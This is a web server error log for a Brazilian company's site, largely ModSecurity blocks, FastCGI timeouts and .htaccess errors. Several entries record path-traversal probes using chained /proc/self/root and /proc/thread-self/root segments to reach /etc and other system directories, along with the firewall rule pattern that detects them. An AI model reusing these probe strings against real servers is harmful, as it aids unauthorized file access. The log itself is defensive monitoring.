[Wed Mar 18 17:15:40.803618 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:59086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absH7P-YZRR_7pZ7nDIvggAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:16:06.123594 2026] [proxy_fcgi:error] [pid 9530:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41880] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:16:08.909841 2026] [mime_magic:error] [pid 14269:tid 140411616036608] (70014)End of file found: [client 57.141.18.20:43298] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:16:12.187693 2026] [:error] [pid 9530:tid 140411658000128] [client 74.7.244.43:38886] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absIDASuyh5UNeevTVfi8AAAAwo"]
[Wed Mar 18 17:16:12.568179 2026] [mime_magic:error] [pid 15051:tid 140411548894976] (70014)End of file found: [client 57.141.18.43:42878] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:16:18.775453 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:57960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absIEvu8EFLIOrSqIps-GQAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:16:21.566296 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.228.61:54260] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absIFQkwaGbbGflqUZBRlwAAAM4"]
[Wed Mar 18 17:16:26.449869 2026] [mime_magic:error] [pid 17887:tid 140411624429312] (70014)End of file found: [client 57.141.18.31:43470] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:16:38.117790 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42410] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:16:45.482684 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.241.31:51198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absILf-YZRR_7pZ7nDIvnwAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 17:16:48.564331 2026] [mime_magic:error] [pid 15826:tid 140411641214720] (70014)End of file found: [client 57.141.18.10:44034] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:17:12.125878 2026] [proxy_fcgi:error] [pid 29882:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43050] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:17:48.126969 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43820] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:18:18.129809 2026] [proxy_fcgi:error] [pid 15051:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44426] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:18:49.127958 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45022] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:18:51.378873 2026] [core:alert] [pid 23798:tid 140411699963648] [client 57.141.18.114:46030] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:19:17.131906 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45612] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:19:40.089876 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46150] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:20:03.153797 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46726] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:20:24.121943 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47242] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:20:46.125865 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47686] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:20:49.534287 2026] [:error] [pid 27293:tid 140411616036608] [client 216.73.216.191:17769] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absJIf-YZRR_7pZ7nDIwSwAAA88"]
[Wed Mar 18 17:20:53.898585 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:39852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absJJeoXxyEfFpUF8f-0mgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:21:10.121782 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48188] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:21:13.021911 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.244.43:37312] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absJOQkwaGbbGflqUZBSdgAAAM4"]
[Wed Mar 18 17:21:21.794796 2026] [:error] [pid 23798:tid 140411624429312] [client 74.7.228.61:48950] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absJQT-9rzzdA3Ti0NCPzAAAAY4"]
[Wed Mar 18 17:21:34.137807 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:21:58.723623 2026] [mime_magic:error] [pid 23798:tid 140411674785536] (70014)End of file found: [client 57.141.18.76:50286] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:22:04.125818 2026] [proxy_fcgi:error] [pid 29882:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49262] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:22:09.425951 2026] [core:alert] [pid 15051:tid 140411741927168] [client 57.141.18.32:50246] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:22:33.108997 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49770] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:23:02.137736 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50332] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:23:22.501805 2026] [mime_magic:error] [pid 31803:tid 140411666392832] (70014)End of file found: [client 57.141.18.63:51318] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:23:27.584145 2026] [core:alert] [pid 15051:tid 140411699963648] [client 216.73.216.191:30209] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:23:33.120682 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50848] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:23:49.630763 2026] [mime_magic:error] [pid 9530:tid 140411708356352] (70014)End of file found: [client 57.141.18.41:52268] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:24:08.152135 2026] [proxy_fcgi:error] [pid 29882:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51482] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:24:41.340025 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52174] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:24:53.406467 2026] [mime_magic:error] [pid 17887:tid 140411624429312] (70014)End of file found: [client 74.7.241.31:58680] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/local
[Wed Mar 18 17:24:53.406618 2026] [access_compat:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:58680] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/local
[Wed Mar 18 17:25:13.125915 2026] [proxy_fcgi:error] [pid 29882:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52896] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:25:26.374062 2026] [mime_magic:error] [pid 27293:tid 140411658000128] (70014)End of file found: [client 57.141.18.61:54690] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:25:28.288830 2026] [mime_magic:error] [pid 23798:tid 140411716749056] (70014)End of file found: [client 57.141.18.67:54726] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:25:39.137805 2026] [proxy_fcgi:error] [pid 27403:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53482] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:25:39.596105 2026] [mime_magic:error] [pid 17887:tid 140411565680384] (70014)End of file found: [client 74.7.241.31:57586] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/lib
[Wed Mar 18 17:25:39.596331 2026] [access_compat:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:57586] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/lib
[Wed Mar 18 17:25:42.774501 2026] [mime_magic:error] [pid 30077:tid 140411557287680] (70014)End of file found: [client 57.141.18.122:54962] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:26:02.057847 2026] [proxy_fcgi:error] [pid 9530:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53956] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:26:13.734001 2026] [:error] [pid 9800:tid 140411590858496] [client 74.7.244.43:53890] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absKZYJpNEVVDhwB8vODvwAAA5I"]
[Wed Mar 18 17:26:23.694223 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.228.61:47188] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absKbxkFeYa1D6dYQnCMMgAAAdU"]
[Wed Mar 18 17:26:26.057845 2026] [proxy_fcgi:error] [pid 9800:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54418] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:26:30.590099 2026] [mime_magic:error] [pid 9800:tid 140411590858496] (70014)End of file found: [client 74.7.241.31:34314] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run
[Wed Mar 18 17:26:48.878162 2026] [:error] [pid 9530:tid 140411548894976] [client 74.7.243.128:35604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absKhwSuyh5UNeevTVfkGAAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:26:50.153819 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54964] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:27:13.953817 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55434] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:27:36.121871 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55894] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:28:02.121290 2026] [proxy_fcgi:error] [pid 29882:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56396] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:28:28.121800 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56914] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:28:56.120208 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57420] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:29:21.394798 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:47176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absLIcdf6f5d65gmYZQUKwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:29:28.125896 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58174] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:29:54.127721 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58858] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:30:04.900193 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:54150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absLTP-YZRR_7pZ7nDIxcAAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 17:30:05.164365 2026] [mime_magic:error] [pid 9800:tid 140411607643904] (70014)End of file found: [client 57.141.18.56:60240] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:30:17.129798 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59350] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:30:37.571013 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:41658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absLbcdf6f5d65gmYZQUTgAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:30:40.126827 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59858] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:31:02.941845 2026] [mime_magic:error] [pid 17887:tid 140411557287680] (70014)End of file found: [client 57.141.18.76:33878] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:31:04.085884 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60330] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:31:14.091147 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.244.43:35500] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absLkgkwaGbbGflqUZBTjwAAANA"]
[Wed Mar 18 17:31:29.128431 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60870] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:31:29.340695 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.228.61:39522] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absLoUzinOy1jxa1j4deAAAAAQ4"]
[Wed Mar 18 17:31:53.132023 2026] [proxy_fcgi:error] [pid 15051:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33214] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:32:12.181068 2026] [mime_magic:error] [pid 15051:tid 140411708356352] (70014)End of file found: [client 57.141.18.100:35548] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:32:15.127467 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33698] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:32:40.108563 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34172] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:32:50.944050 2026] [core:alert] [pid 15051:tid 140411708356352] [client 57.141.18.25:35812] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:33:14.175253 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34854] AH01075: Error dispatching request to : (polling)
